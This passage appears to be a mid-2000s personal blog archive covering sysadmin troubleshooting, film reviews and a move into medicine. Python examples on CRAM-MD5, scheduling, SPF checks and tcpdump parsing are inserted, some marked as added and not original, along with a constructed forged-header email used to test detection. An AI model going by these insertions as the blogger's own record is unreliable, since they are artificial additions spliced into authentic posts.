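    challenge = b"<1896.697170952@mail.example.test>"  # constructed challenge
    record = store_hashed(password)
    response = cram_md5_response(user, password.encode(), challenge)
    return {
        # Hash-only store, password sent over the (TLS-protected) wire.
        "plain_vs_hash_store": verify_plain(record, password),
        # Server keeps the password in the clear: challenge-response works.
        "cram_vs_plaintext_store": verify_cram(
            user, password.encode(), challenge, response),
        # Server only has the digest: it cannot derive the client's key.
        "cram_vs_hash_store": verify_cram(user, record[1], challenge, response),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case}: {'accepted' if ok else 'rejected'}")
```

The trade-off is which secret is exposed where: PLAIN over TLS exposes the password in transit only to the server, while a plaintext password table exposes every account to anyone who can read the database.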
I have decided to go back to school to study medicine. Those that know me probably think I'm going insane, and I don't blame you. Maybe I am.
Honestly medicine is something I've always wanted to get into but felt it was too late for me. I've always felt that being a doctor would be a very noble profession, and I would like to ultimately do something to help others in life. Computers are great and all, but the IT field is not very fulfilling for me. I found a pretty good site describing a Comp Sci PHD grad going back to school for medicine at age 37. He posted a lot of useful information to help others. Another interesting page is this story about a man going to med school at age 52!
I am 30 now, and my dad is an ER doctor. He told me that some of his co-doctors started school at age 38 and above. In general I am finding out that age should not be a limiting factor for me. It would be great if I could use my computer science background in medicine, and I know of many fields I could get into. I have the funding necessary to go back to school, which is a huge influence on my decision.
What it would involve is me going back to school for about 2 years just taking prerequisites for the MCAT. Some of these classes I've already taken, but in no way remember, so much of it would be a refresher. The courses are college algebra, calculus, biologies (many!), chemistry 1 and 2, organic chem, physics 1 and 2, and other electives. At that point I would be ready for the MCAT, and after that would need to apply to med schools. That's probably another 6-8 years. I hear it's very difficult to get into schools, and students apply to 10-15 or so. Here is a somewhat discouraging comment on Slashdot about one person's experience.
I have decided to resign from my current job effective 5/13/05 (yes, that's Friday the 13th). I would start summer courses immediately. I've set up a wiki to help me keep track of things, and hopefully I'll be able to update my blog as things go. I don't know whether I'll succeed. Maybe I will get fed up and come back to IT, who knows. We will see!
I find the OS X startup chime annoying, especially when powering up my powerbook in a quiet room (meeting, library, etc). My boss says it sounds like Sinead O'Connor's Nothing Compares to You.
Searching on macosxhints.com led me to this app which lets you mute and control the volume of the startup chime. Ahh, much better.
I would like to backup certain items from my website (MySQL, etc) to my Powerbook on a weekly basis. Normally I could use cron but my laptop has to be on at the time for it to work properly.
I knew about anacron, and found this hint. Anacron will let me schedule backups and also takes care of running the periodic crons that come standard on OS X, which probably have never run for me in the past.
We have a Coraid device with 10 120gig drives setup as storage for our mailserver. This Saturday at about 5am the Coraid powered off, and appeared to be a problem with the power supply. I came in later in the morning to check it out.
We took apart the unit and found that it has a simple rackmount ATX power supply. The motherboard connector plugs into the Coraid backplane and 3 HD power connectors also plugin to the same board.
We had an ATX power supply tester which plugs in to the motherboard connector and has an on/off switch. We connected it to the power supply, switched it on, and it powered on. Then we connected it back to the Coraid, and the unit powered on as well. We put it back together and it seems stable.
Obviously we'd like to prevent this from recurring. Coraid support told me that they've never heard of a problem like this. They mentioned it might have been a power glitch causing the switching power supply to freeze. They asked us to check our UPS load, but it is very low and the other systems on it exhibited no problems. They claimed that it does not sound like a defective power supply.
I'm not so sure. Honestly these boxes should be built with redundant power supplies, but unfortunately it seems rather cheaply made. We have to keep our eye on the unit, but we still don't know why it failed. We will probably buy another power supply just to be safe.
Here be spoilers.
This movie is about 3 hours of Nicole Kidman getting raped by 10 or so males in a town called Dogville. Dogville is supposed to be a representation of America. Grace (Kidman) is sort of an innocent fugitive which the town takes under their wing. She offers her help to do different tasks around town. Soon they start to take advantage of her more and more, and if there ever was a movie showing a 'deflowering' of an innocent girl it is this one. Eventually she becomes a slave, chained, sexually assaulted, etc. Kidman looks beautiful and acts great though, as always.
The director absolutely hates the US, and it is vividly apparent. I can understand hatred of a society, but the film borders on insanity (even Ebert thinks so). If it were not for the ending, I would have been very disappointed with the film. Granted there are some evil people in this world, but they are in every country just as much as they are in America. The ending can only be described as revenge. Grace turns into the person she most desperately does not want to become. Giving orders to kill a mother and her children, Grace says "Make the mother watch and tell her you will stop killing the rest of her children if she doesn't cry." Of course she does cry. But it is revenge, and at this point you agree with her.
The movie is heavy on dialogue and philosophical ponderings. One thing I really liked is that the Kidman character originally is a merciful one, but the town changes her. She was idealistic, and believed that rapists and murderers should be forgiven for their sins. However, when those sins are done to her, though she tries, she cannot forgive. It is a double-standard, and this is where I think the true social criticism of the movie is.
I also liked the set pieces. The town is represented by chalk lines on the ground, and there are no walls. I'm not sure what the director was trying to say here, maybe that the town is so dependent on each other that they cannot survive on their own.
The movie was directed by Lars Von Trier. I remember the first movie I saw by him, called Zentropa. It was a very strange and hypnotic film. One thing I distinctly remember was the main character dying at some point and the film sort of following him through his own death sequence, and the nothingness afterwards. It was probably the most eerie drowning sequence I've ever seen, and gave a good feeling of what death must be like. What's worse is the movie kept going, without its main character. I was very intrigued by it, and watched some of his other films which I loved (like Dancer in the Dark). He takes a lot of risks, and he has a lot of talent.
I'm reading this very good book documenting a surgeon's life through residency. It is written as the doctor is just starting out, and goes through the learning process. Here is a good quote from the first chapter:
Not everyone appreciates the attractions of surgery. When you are a medical student in the operating room for the first time, and you see the surgeon press the scalpel to someone's body and open it like fruit, you either shudder in horror or gape in awe. I gaped. It was not just the blood and guts that enthralled me. It was the idea that a mere person would have the confidence to wield that scalpel in the first place.
There is a saying about surgeons, meant as a reproof: "Sometimes wrong; never in doubt." But this seemed to me their strength. Every day, surgeons are faced with uncertainties. Information is inadequate; the science is ambiguous; one's knowledge and abilities are never perfect. Even with the simplest operation, it cannot be taken for granted that a patient will come through better off--or even alive. Standing at the table my first time, I wondered how the surgeon knew that he would do this patient good, that all the steps would go as planned, that bleeding would be controlled and infection would not take hold and organs would not be injured. He didn't, of course. But still he cut.
I've been using Nagios at work for network monitoring. I honestly wish this was still called Netsaint, as I sound like an idiot trying to pronounce Nagios.
Anyhow, it's a great system that works very well. I have it currently installed behind our firewall on a private IP. We have 2 T1s, one through Bellsouth, and one through Qwest. The default gateway for the monitoring system is through the Bellsouth T1.
I would like it to monitor connectivity through both T1s and was thinking how to do this. Our routers are actually Linux boxes, so one way I was thinking is I could use the 'check_by_ssh' plugin to execute a network connectivity test directly on each router, by doing something like a wget to www.google.com.
Another way is to set up a static route for some external website to go through the Qwest T1. Let's say I use www.cnn.com for the Qwest T1 check. Looking up their IP I could add their address block to a static route:
route add -net 64.236.16.0 netmask 255.255.240.0 gw QWEST_FW
I decided to do the route method. It's not great, since cnn could change their IPs anytime, and also just because cnn is not accessible doesn't mean the Internet connectivity is down. But we had no monitoring in place so I wanted something.
Here is an interesting article on certifications. I agree that GIAC's main benefit was its practical assignment. It was probably the most difficult part of the certification, and a shame that they will be taking it out.
As far as RHCE, the article states:
... Is this certification worthwhile? For many security people looking to understand Linux better, the answer would be a resounding yes. The RHCE seems to be the last remaining cert that makes you demonstrate your skills via a practical, hands on portion. Unlike the "paper certification" syndrome as mentioned above, the practical segment of the RHCE makes it stand out for all the right reasons. A prospective employer will know that you can actually do the hands on work once you have earned this certification.
I definitely agree with this. The RHCE has a great hands-on test that requires you to fix broken systems. It requires that you know quite a bit about Linux systems in general, even if somewhat specific to Red Hat. Many times I have had to employ the same skills in the work environment.
I had an idea of going back to school to take some courses. I have no final decision on this, but for fun I was looking at FAU's summer course listings and was trying to come up with a course schedule.
At some point I realized this course scheduling procedure, which involves checking to make sure the classes don't conflict and corequisites are taken, was rather time-consuming. I thought, why don't I just write a program that takes as input the courses wanted, parses the listings, and devises a list of possible schedules for me that don't conflict and have all the corequisites.
So I started writing some Python. The main algorithm underwent a lot of changes, and I got some good algorithm advice from Randall. Writing it out on paper helped me. The output of the program looks like this. In general it works as follows:
Let's say I have the list wanted which contains the list of courses that I want to take: (A, B, C). Next I have the full courselist: (A1, A2, A3, B1, B2, C, D1, D2). The numbers represent different times for the same course. I used a recursive function to get the various permutations, though they are not exactly permutations because they should only have one of each course.
First I strip from courselist any course that is not in wanted, which reduces the set quite a bit. From the example above, the 'D' courses would be removed. I keep a list called schedule that keeps track of the current schedule. I split the courselist into 2 lists, one containing the first element and all courses that are the same as that element. These can be thought of as parent nodes in a tree. The rest becomes the second list. So I end up with something like this:
schedule = ()
roots = (A1, A2, A3)
rest = (B1, B2, C)
Next I loop through roots, building a schedule for each. On the next recursion, it would look like:
schedule = (A1)
roots = (B1, B2)
rest = (C)
... next recursion
schedule = (A1, B1)
roots = (C)
rest = ()
The recursion should be apparent. Once either rest or roots is empty, I save the schedule. That operation does other checks such as making sure none of the classes conflict, and that the schedule contains all the needed corequisites.
Might not be useful to others, but was to me. Anyhow, it's good to do little programming projects every now and then or I get rusty.
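The roots/rest recursion described above, as an added sketch rather than the original program: the Section fields, the meeting times and the coreqs mapping are constructed for illustration, and a schedule is saved once no courses remain to be placed.

```python
from collections import namedtuple

# One section (time slot) of a course. All sample data here is constructed.
Section = namedtuple("Section", "course label days start end")

def hm(hour, minute=0):
    """Clock time as minutes since midnight."""
    return hour * 60 + minute

def conflicts(a, b):
    """Two sections clash when they share a day and their time ranges overlap."""
    return bool(a.days & b.days) and a.start < b.end and b.start < a.end

def valid(schedule, coreqs):
    """Checks run when a schedule is saved: no clashes, all corequisites present."""
    for i, a in enumerate(schedule):
        if any(conflicts(a, b) for b in schedule[i + 1:]):
            return False
    taken = {s.course for s in schedule}
    return all(coreqs.get(course, set()) <= taken for course in taken)

def build(courselist, schedule, coreqs, results):
    """Split courselist into roots and rest, then recurse once per root."""
    if not courselist:
        if valid(schedule, coreqs):
            results.append(schedule)
        return
    first = courselist[0].course
    roots = [s for s in courselist if s.course == first]   # sections of one course
    rest = [s for s in courselist if s.course != first]    # everything else
    for root in roots:
        build(rest, schedule + (root,), coreqs, results)

def schedules(wanted, courselist, coreqs=None):
    """Every clash-free schedule holding exactly one section of each wanted course."""
    # Strip courses that are not wanted before recursing, as described above.
    pruned = [s for s in courselist if s.course in wanted]
    if {s.course for s in pruned} != set(wanted):
        return []  # some wanted course is not offered at all
    results = []
    build(pruned, (), coreqs or {}, results)
    return [tuple(s.label for s in schedule) for schedule in results]

# Constructed listing matching the (A1, A2, A3, B1, B2, C, D1, D2) example.
COURSELIST = [
    Section("A", "A1", frozenset("MW"), hm(9), hm(10, 15)),
    Section("A", "A2", frozenset("TR"), hm(9), hm(10, 15)),
    Section("A", "A3", frozenset("MW"), hm(13), hm(14, 15)),
    Section("B", "B1", frozenset("MW"), hm(9, 30), hm(10, 45)),
    Section("B", "B2", frozenset("TR"), hm(11), hm(12, 15)),
    Section("C", "C", frozenset("TR"), hm(9, 30), hm(10, 45)),
    Section("D", "D1", frozenset("MW"), hm(9), hm(10, 15)),
    Section("D", "D2", frozenset("F"), hm(9), hm(12)),
]

if __name__ == "__main__":
    for labels in schedules(("A", "B", "C"), COURSELIST):
        print(labels)
```
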
Today I struggled to get Apache set up as a reverse proxy. The idea is you have a server on your intranet, say internal.server.com, that you want to be able to access from the Internet as, say external.server.com.
A reverse proxy is set up on external.server.com, and HTTP requests are proxied to the internal server. This allows you to wrap SSL over the connection, or even use separate authentication on the external server. There are issues though. The HTTP headers need to be rewritten from external.server.com to internal.server.com for requests, and vice versa for responses. This can be done with mod_rewrite. Additionally, you would need to rewrite the HTML to change any links. That's where it gets tricky.
The only thing I could find was mod_proxy_html. There was no Debian package, and I had a lot of trouble trying to get this to compile with Apache 1.3. So I went ahead and grabbed the Apache 2 Debian packages, which had a pre-built mod_proxy_html. I wanted to wrap SSL on the connection, but found that the SSL configuration is not set up by default in Debian. I found this blog which had a lot of useful info for setting up SSL with Apache 2 on Debian quickly.
Next I followed the tutorial to set up the reverse proxy. After much trial and error it was working mostly, but didn't rewrite meta-equiv refresh stuff properly, even with the proper mod_proxy_html options to supposedly make it do that. Ok, not a big deal. Then while testing an internal Twiki site, I saw that the html got fucked up on certain pages, with random >'s and such. Not a good sign. I was ready to ditch this solution.
Pete pointed me to CGIProxy, which I figured I would give a try. This is basically a Perl CGI script that acts as a proxy. To my surprise, it was simple to set up, and just works flawlessly. I was concerned that the last update to the script was in 2002, but it looks like it is stable. I can still wrap SSL over it, or do authentication, etc. I definitely recommend this over the Apache config hackery.
The idea of 'workflow' is being thrown around a lot at work. The hope is to streamline business processes.
First of all I think this whole concept of workflow is more complex than it needs to be. One of the least 'vague' packages I found was Openflow, which is based on Zope. I've been doing some reading on Zope and I think it's a very cool web framework. But this Openflow thing has shitty documentation. At least put some howto up to help people try your code. There I noticed links to the Workflow Management Coalition which has some sort of standard out. There is a TALES language specification for defining workflows. Ugh, it's all ripe for picking by commercial packages.
Then I found another package called CMSOpenflow which looks based on Openflow, but requires Zope, Plone, CMS, blah blah. It's still very cryptic to me, and why am I going to install all this stuff for something I have no understanding of.
I thought the simplest workflow, at least that I could understand, was an approval system. There is some purchase request, someone needs to look over it and approve it. Simple.
Pete over at Mako pointed me to Twiki, so I started looking for plugins. I found ApprovalPlugin, which is probably the clearest explanation of a workflow implementation I've read. So I'm reading about it and notice the author. Wow, it's an old co-worker from Z-Kat. Nice work!
I'm still not very excited about this. It's hard to be excited about business processes.
I've been playing with Zabbix for network monitoring. I had first heard about it in Linux Magazine, and the trending functionality looked interesting.
I spent about a week testing both the current stable version and the alpha. The stable one is quite old, and from an administrative standpoint is not really up to par. I have since moved to the alpha version.
The system is very nice. It monitors many things on Linux boxes and provides very useful graphs of all the data. You can easily see how fast disk usage is growing, trends in CPU load, memory, etc. All the configuration is done via the web. It has a very nice graph creation procedure, and you can create custom graphs with any variables you like on the fly. It's all generated in real-time.
One drawback I see is that it is not very scalable to administer via the web. For example you have dropdowns with a huge number of items in them even with just a few monitored hosts. The database (mysql) does not seem very optimized for large amounts of data. There is a lot of duplication of data that can be normalized. The alerting features are also sub-par when compared to Nagios. Quite a few times I've had false alarms, and I've not been able to pinpoint the issue. Nagios has nice features such as retesting services to make sure they are down before paging you. Those features are missing from Zabbix.
In general though I like Zabbix so much that I'm reluctant to ditch it. It seems to have very good potential, and I love the trending/graphing features. These are missing from Nagios. I will probably ditch it though, as it's more important to me to have a robust alerting system rather than trending performance data.
I saw a French movie this weekend called Fear and Trembling. It's an autobiography of a woman that goes to work for a corporation in Japan in 1989.
It's an amazing portrayal of Japanese office culture. I thought my office experience was bad, but after watching this, my worst experience was like heaven compared to this. It's hard to tell whether this movie was a comedy or drama, because it gets very serious at times, and some parts are ridiculously funny. It seems such offices were all about public humiliation taken to its extreme. It was all about servility, and climbing the corporate ladder. The main character goes up and down this ladder, from accountant to toilet cleaner.
I liked how it showed that not everyone in the company management was evil. You had the sumo wrestler vice president, whose main job was to verbally shit on everyone. His scenes were hilarious. There is one scene where he is yelling at a female worker for not tasting the chocolate on his desk. Then you had the president, who was the nicest person on earth and licked your wounds. Then you had the impossibly friendly co-worker, who stabs you in the back to prevent you from getting up the ladder faster than they did.
The main character narrates one scene when a boss is yelling at a female worker, describing it as a rape scene. And really, that's what it was.
What surprised me so much was that people took such abuse and did not quit. People expected the abuse and dealt with it. And it was almost like the more abuse they could take, the higher up they would get.
The ending was very thoughtful, and very strange. Essentially, the main character's salvation is to succumb to the humiliation at the highest degree. By letting the others do this to her, she gives them the satisfaction that they are all searching for in their life, to the point where, as she described it, her superior achieves orgasm.
Granted the movie does portray Japanese office culture in a very bad light, and some would argue it is unrealistic. But it was fascinating to watch nonetheless.
Today it was reinforced to me how great it is to work with open source software. The benefit is not just having the source, but being able to change it to work how you need. Here's the example.
We use Communigate Pro as a mail server we are transitioning to. Our MX record is still our old mail server, so the required mail is relayed to Communigate. Essentially the path of incoming messages is:
internet -> our.mx.server -> our.cg.server
Communigate has the ability to check SPF records, and reject messages based on that. I like SPF, and in my opinion works fairly well to reject some spam. But I can't use it in the above scenario because all mail comes from our.mx.server.
On cg, we are also running SpamAssassin. I knew SA had SPF support. I had run it with the -D (debugging) option to see what it does in regards to SPF. The problem now is that SA considered our.mx.server as a trusted relay and skipped SPF checks.
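Why a connection-level SPF check is useless behind a relay, and what a relay-aware check looks like, as an added example that is not CommuniGate's or SpamAssassin's code. The SPF record, all IP addresses, example.net and both messages are constructed; the evaluator handles only ip4: and all mechanisms and assumes the relay leaves the envelope sender unchanged.

```python
import ipaddress
import re
from email import message_from_string

SPF_RECORD = "v=spf1 ip4:192.0.2.0/24 -all"   # constructed record for example.net
MX_IP = "203.0.113.5"                          # constructed address of our.mx.server
TRUSTED_HOSTS = {"our.mx.server", "our.cg.server"}
TRUSTED_IPS = {MX_IP}

RESULTS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
RECEIVED = re.compile(r"from \S+ \(\S+ \[(?P<ip>[0-9.]+)\]\)\s+by (?P<by>\S+)")

def spf_eval(record, ip):
    """Evaluate the ip4: and all mechanisms of an SPF record against one address."""
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:            # skip the "v=spf1" version tag
        qualifier = term[0] if term[0] in RESULTS else "+"
        mech = term.lstrip("+-~?")
        if mech.startswith("ip4:") and addr in ipaddress.ip_network(mech[4:], strict=False):
            return RESULTS[qualifier]
        if mech == "all":
            return RESULTS[qualifier]
    return "neutral"

def external_ip(raw_message):
    """IP of the host that handed the message to our first relay, or None.

    Received headers are read newest first. Only headers written by our own
    hosts are believed; anything below the first external hop may be forged.
    """
    msg = message_from_string(raw_message)
    for header in msg.get_all("Received", []):
        m = RECEIVED.search(header)
        if not m or m["by"] not in TRUSTED_HOSTS:
            return None                        # not written by one of our hosts
        if m["ip"] not in TRUSTED_IPS:
            return m["ip"]                     # first hop outside our relays
    return None

def check(raw_message):
    """Return (result using the connecting IP, result using the external hop)."""
    naive = spf_eval(SPF_RECORD, MX_IP)        # the final server only ever sees the MX
    hop = external_ip(raw_message)
    aware = spf_eval(SPF_RECORD, hop) if hop else "none"
    return naive, aware

# Constructed messages: internet -> our.mx.server -> our.cg.server
LEGIT = """\
Received: from our.mx.server (our.mx.server [203.0.113.5]) by our.cg.server with ESMTP; Sat, 1 Jan 2005 10:00:02 -0500
Received: from mail.example.net (mail.example.net [192.0.2.25]) by our.mx.server with ESMTP; Sat, 1 Jan 2005 10:00:01 -0500
From: alice@example.net
Subject: constructed legitimate message

hello
"""

SPOOFED = """\
Received: from our.mx.server (our.mx.server [203.0.113.5]) by our.cg.server with ESMTP; Sat, 1 Jan 2005 11:00:02 -0500
Received: from mail.example.net (unknown [198.51.100.77]) by our.mx.server with ESMTP; Sat, 1 Jan 2005 11:00:01 -0500
Received: from internal (internal [192.0.2.25]) by mail.example.net with ESMTP; Sat, 1 Jan 2005 11:00:00 -0500
From: alice@example.net
Subject: constructed spoofed message with a forged Received header

hello
"""

if __name__ == "__main__":
    print("legit  ", check(LEGIT))
    print("spoofed", check(SPOOFED))
```

The connecting-IP result is identical for both messages, while the relay-aware result separates them; the forged bottom header in the spoofed message is never consulted.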
Next it was time to look at the source. I ended up looking at PERLLIB/Mail/SpamAssassin/Plugin/SPF.pm and noticed line 165 is where the 'trusted relays' are being checked. The comment around that code was that trusted relays 'may' change the envelope from, so we can no longer trust it. I thought of just commenting out that block, but I wanted to find out some more info as to why this check was added, so I went over to SpamAssassin's download page hoping to find a CVS browser with changelogs. I didn't, but then did some googling and found the CVS updates mailing list.
That got me further, and pointed me to the SpamAssassin ViewCVS. I dug around for SPF.pm, but didn't find many comments on that code (but I didn't look too hard).
Then I thought maybe someone else has this issue and searched the devel mailing list with Gmane. The first result of the search string 'spf' pointed me to this bug which describes exactly my issue (and my original solution to comment out the block). I've come full circle, which is usually a good sign.
So why have I blogged this? Well I just thought this whole process showed the true importance of open source: being able to find information and hack what you please.
Here's an informative article on the GRUB bootloader. The tab-completion is really nice. A good read for those planning on an RHCE certification.
The b2evolution developers suggest making plugins for modifications, but I felt the above too simple to warrant class inheritance and all that crap. We'll see how it works. Unfortunately, SURBL is mostly for links in spam email, and I doubt their submission form would accept blog comment spam. Anyhow, I think it should help somewhat.
At work they were testing a Business Continuation Plan, which pretty much is a setup that allows the company to continue business in the event of a disaster.
For Internet access we had a simple Linksys router with a DSL line. During the test, Internet connectivity was determined to be working by going to Google and making sure the page loaded up. A tester said they couldn't get their email, so I was pulled in to figure out what was wrong.
So I started simple, doing some pings to www.google.com. Response was ok. Then went to the Google site in Firefox and Internet Explorer without issues. Then I tried telnetting to our mail server port 143 (IMAP), 25 (SMTP), 80 (HTTP), 443 (HTTPS), and 110 (POP). All gave me connections, and I was able to send simple commands without issues. But Outlook was crapping out.
Outlook was set up to use CommuniGate Pro's MAPI connector, which essentially converts everything to IMAP. I really didn't think the connector was at fault because it has worked fine in the past.
I then tried going to our webmail and didn't get anything! What was going on? I could connect via telnet, but not via any browser. Next I tried another site besides Google, such as www.cnn.com. That page didn't load up either... neither did Yahoo. I thought maybe it was network routing issue, but I could ping the destinations just fine. And even when CNN didn't load up in the browser, I could still telnet to port 80. Some screwed up proxying by Bellsouth DSL?
I thought it was a browser issue, but both IE and Firefox had the same results. Why would Google load up but not other sites? Next I had to connect a real system (i.e. Unix) to this network and do some tcpdumps. I started a tcpdump, and ran a wget:
wget -O - -q http://www.cnn.com/
I got nothing back as expected, and saw in the tcpdump:
sudo tcpdump -nlp -i en1 port 80
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on en1, link-type EN10MB (Ethernet), capture size 96 bytes
20:11:27.120888 IP 192.168.1.100.54924 > 64.236.24.28.80: S 1892952170:1892952170(0) win 65535 [mss 1460,nop,wscale 0,nop,nop,timestamp 4252212886 0]
20:11:27.187946 IP 64.236.24.28.80 > 192.168.1.100.54924: S 3676883317:3676883317(0) ack 1892952171 win 5840 [mss 1460]
20:11:27.188062 IP 192.168.1.100.54924 > 64.236.24.28.80: . ack 1 win 65535
20:11:27.188228 IP 192.168.1.100.54924 > 64.236.24.28.80: P 1:582(581) ack 1 win 65535
The 3-way handshake is there, but once the GET request is sent, nothing comes back.
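The same reading of the capture done mechanically, as an added example that is not part of the original troubleshooting: it classifies each TCP flow in tcpdump text output so that "handshake fine, request sent, nothing back" stands apart from an unreachable host. PAGE_CAPTURE is the capture above; CONSTRUCTED and its 203.0.113.x addresses are made up for comparison.

```python
import re

# One TCP line in the tcpdump format shown above: time, "IP", src.port > dst.port,
# flags, optional "seq:seq(length)" range, optional "ack N".
LINE = re.compile(
    r"^\d\d:\d\d:\d\d\.\d+ IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): "
    r"(?P<flags>[SFPRWE.]+)"
    r"(?: \d+:\d+\((?P<len>\d+)\))?"
    r"(?: ack (?P<ack>\d+))?"
)

def verdict(flow):
    """Summarise one flow from the client's point of view."""
    if flow["reset"]:
        return "reset by peer"
    if not flow["established"]:
        return "no handshake"
    if flow["sent"] and not flow["received"]:
        return "request sent, no response"
    return "ok"

def analyse(capture):
    """Return {"client -> server": verdict} for every TCP flow that starts in the capture."""
    flows = {}
    for raw in capture.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue                       # banner lines and anything that is not TCP
        src = (m["src"], int(m["sport"]))
        dst = (m["dst"], int(m["dport"]))
        flags, length = m["flags"], int(m["len"] or 0)
        has_ack = m["ack"] is not None
        if "S" in flags and not has_ack:
            # Bare SYN: src is the client opening (or retrying) a connection.
            flows.setdefault((src, dst), {"synack": False, "established": False,
                                          "reset": False, "sent": 0, "received": 0})
            continue
        if (src, dst) in flows:            # client -> server
            flow = flows[(src, dst)]
            if flow["synack"] and has_ack:
                flow["established"] = True # client acknowledged the SYN-ACK
            flow["sent"] += length         # payload bytes, retransmissions included
        elif (dst, src) in flows:          # server -> client
            flow = flows[(dst, src)]
            flow["synack"] |= "S" in flags
            flow["reset"] |= "R" in flags
            flow["received"] += length
    return {"%s:%d -> %s:%d" % (c + s): verdict(f) for (c, s), f in flows.items()}

# The capture from this post.
PAGE_CAPTURE = """\
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on en1, link-type EN10MB (Ethernet), capture size 96 bytes
20:11:27.120888 IP 192.168.1.100.54924 > 64.236.24.28.80: S 1892952170:1892952170(0) win 65535 [mss 1460,nop,wscale 0,nop,nop,timestamp 4252212886 0]
20:11:27.187946 IP 64.236.24.28.80 > 192.168.1.100.54924: S 3676883317:3676883317(0) ack 1892952171 win 5840 [mss 1460]
20:11:27.188062 IP 192.168.1.100.54924 > 64.236.24.28.80: . ack 1 win 65535
20:11:27.188228 IP 192.168.1.100.54924 > 64.236.24.28.80: P 1:582(581) ack 1 win 65535
"""

# Constructed lines: one healthy exchange and one SYN that is never answered.
CONSTRUCTED = """\
20:15:02.000100 IP 192.168.1.100.54930 > 203.0.113.10.80: S 100:100(0) win 65535
20:15:02.050200 IP 203.0.113.10.80 > 192.168.1.100.54930: S 900:900(0) ack 101 win 5840
20:15:02.050300 IP 192.168.1.100.54930 > 203.0.113.10.80: . ack 1 win 65535
20:15:02.050400 IP 192.168.1.100.54930 > 203.0.113.10.80: P 1:120(119) ack 1 win 65535
20:15:02.110500 IP 203.0.113.10.80 > 192.168.1.100.54930: . ack 120 win 5840
20:15:02.120600 IP 203.0.113.10.80 > 192.168.1.100.54930: P 1:1200(1199) ack 120 win 5840
20:20:00.000000 IP 192.168.1.100.54940 > 203.0.113.20.80: S 500:500(0) win 65535
20:20:03.000000 IP 192.168.1.100.54940 > 203.0.113.20.80: S 500:500(0) win 65535
"""

if __name__ == "__main__":
    for name, result in {**analyse(PAGE_CAPTURE), **analyse(CONSTRUCTED)}.items():
        print(name, "=>", result)
```
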
Next I suspected some problem with the DSL line or the Linksys router. I looked through the web interface and saw an option for SPI, or Stateful Packet Inspection, with features to block ActiveX and other crap underneath it. I tried disabling SPI, and did my wget again. It worked!
So it boiled down to the Linksys SPI feature causing problems. It could be that it just doesn't work well for many sites. This explained why the Google page came up: because it was relatively simple HTML. Anything complex, such as CNN, would hang. I checked I was running the latest firmware on the Linksys, and I was.
Lesson learned, Linksys SPI (Stateful Packet Inspection) sucks. Don't use it.
Ugh, my gmail outgoing mail seems to be taking very long to deliver, up to 24 hours! wtf..
I've packaged up the IMAP calendar proxy I've been working on and made it available at my site. Please read the README.
It's nowhere near production-ready, but I figure people can try it and see how it works. I'd appreciate any feedback. I suggest making a backup of your Mozilla calendar file before using it.
The only IMAP server I tested with was CommuniGate Pro. I'm hoping others will behave the same.
Update: Some users have reported issues. Please try the latest version on my site. If you have problems, edit ImapCalendar.py and uncomment the debug line in the init method. Send me the output, removing any passwords, and let me know what IMAP server you're using.
My Adelphia cable started doing video on demand. They had some free stuff to check out, and I came across this video by the Chemical Brothers which I thought was pretty funny.
Over the past few days I've been writing a hack to let Sunbird access a calendar via IMAP. Basically it is a Python HTTP proxy that runs on the same host that you run Sunbird. You configure Sunbird to post to something like http://localhost:8001/Calendar and the proxy converts the request to IMAP.
It keeps track of differences in the calendar updates, and only changes the specific events via IMAP, instead of reposting the whole calendar (changes, additions, removals). This saves a lot of bandwidth when using large calendars.
It's not an elegant solution as I would've liked to do it within Sunbird itself, but it let me learn about IMAP a bit. It's not quite ready for use, but if anyone is interested let me know and I will post it on my site when done. I'd like to do some caching and have it work when offline, as well as reconnect to the IMAP server if the connection is broken, etc.
I may be embarking on a programming project at work. It's basically a web based system that will interface with a database, nothing fantastic.
I would really like to do it in Python. I think the code would be easier to maintain than PHP. So I did some research on Python web programming and unfortunately have not found the right toolkit yet. I spent some time playing with CherryPy and Webware, which are servlet-type frameworks. They are nice, but not quite up to par. The documentation is really lacking in both projects. CherryPy makes things almost too simple, and Webware makes things too complex.
I don't like CherryPy because it does not seem very suitable for production use. It's basically a web server, and I have to restart it every time I make code changes. There is an 'autoreload' module but it seems hackish. Another thing is they talk about using thread-unsafe database connectors like MySQL, but what about thread-safe ones like PostgreSQL? It's unclear how I should implement such a setup with one shared database connection across multiple threads, and the mailing list is rather quiet about database connectivity. It tells me not too many people are using it. However, some reviews are very positive about CherryPy.
Webware is very cool in that code changes are immediate. The problem is it doesn't make things very easy (for example login authentication requires way too much code).
mod_python looks interesting, but again involves a lot of work for simple tasks. Python Servlet Engine does look promising, but I have to play with it more. I wish Python had more widely-used, stable, and standard web programming toolkits.
Today I closed on selling my townhouse in Fort Lauderdale. I ended up getting $40k. This is pretty good, but not great. I bought the house for $220k, kept it for 1 year, and sold for $260k. This pretty much equates to me living almost for free for the past year. Let's see the breakdown.
I stayed in an apartment for 1 year = $12k
I paid closing costs = $10k
I paid mortgage = $16k
I paid other bills = let's say $5k
40 - 12 - 10 - 16 - 5 = -3
So I have a net loss of $3k in the past year. That's not exactly how it breaks down, but close to it. Obviously I would've made more money if I lived in the place longer (it was preconstruction). But the buying and selling is really just buying me time, and letting me live relatively free.
What's next? Well I'm eyeing Port Saint Lucie. There are some fairly good single family homes there running $220-240k. Those are 3 BR, around 1800 sq ft. I really see those appreciating at least 50k a year. Everywhere else is just too damn expensive, and going up. Salaries on the other hand are not.
Today we received another small form factor PC and I set it up as a firewall. We need to statically NAT an external IP to an internal IP, and after some searching I found this article explaining the procedure.
The Stalker guys have always seemed to have an ambivalence towards Linux. I've been on their mailing list for quite some time, and there are a lot of attacks on Linux for having an inferior threading implementation. It's almost to the point where they say that if Communigate crashes, it's due to buggy Linux.
Today while testing Communigate on Debian Stable with kernel 2.4.29 it crashed when I was accessing the SSL webmail interface. This thread pretty much sums up the experience and Stalker's thoughts on it. In my opinion it's a long winded way of them saying "Linux sucks at threading." Especially biting is this message.
Me and some others asked about this issue awhile back. Take a look at the response. The hatred is palpable.
Still, Communigate is a very nice system when it works. You just have to find the right distro. From what I gather, it seems the best choice we have for running Communigate is to ditch Debian and run this in Fedora Core 3.
A co-worker pointed me to this flash parody.
